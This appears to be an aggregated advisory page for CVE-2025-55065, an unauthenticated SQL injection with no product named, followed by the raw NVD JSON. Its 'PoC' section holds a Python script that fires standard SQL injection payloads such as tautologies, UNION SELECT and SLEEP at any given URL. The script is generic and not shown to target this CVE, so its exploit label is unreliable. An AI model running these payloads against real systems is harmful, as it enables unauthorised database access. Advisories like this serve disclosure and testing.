Security Vulnerability Report
中文
CVE-2025-55065 CVSS 7.5 HIGH

CVE-2025-55065

Published: 2026-01-01 19:15:53
Last Modified: 2026-04-15 00:35:42

Description

CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

所有未修复该SQL注入漏洞的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55065 SQL Injection PoC # Target: Vulnerable endpoint with unsanitized SQL input import requests import argparse def test_sql_injection(url, param_name='id'): """Test for SQL injection vulnerability""" # Basic injection test payloads payloads = [ "' OR '1'='1", "' OR '1'='1' --", "' UNION SELECT NULL--", "' AND SLEEP(5)--", "1' ORDER BY 1--", "1' UNION SELECT @@version--" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing SQL injection on {url}") print(f"[*] Target parameter: {param_name}") for payload in payloads: try: params = {param_name: payload} response = requests.get(url, params=params, headers=headers, timeout=10) # Check for SQL error indicators sql_errors = [ 'sql syntax', 'mysql_', 'postgresql', 'ora-', 'microsoft sql', 'sqlite3', 'syntax error', 'unclosed quotation', 'quoted string not properly terminated' ] response_lower = response.text.lower() for error in sql_errors: if error in response_lower: print(f"[!] Potential SQL injection detected!") print(f"[!] Payload: {payload}") print(f"[!] Error found: {error}") return True except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") print("[*] No obvious SQL injection detected") return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-55065 SQL Injection Test') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-p', '--param', default='id', help='Parameter name to test') args = parser.parse_args() test_sql_injection(args.url, args.param)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55065", "sourceIdentifier": "[email protected]", "published": "2026-01-01T19:15:53.367", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"}, {"lang": "es", "value": "CWE-89 Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]"}]}}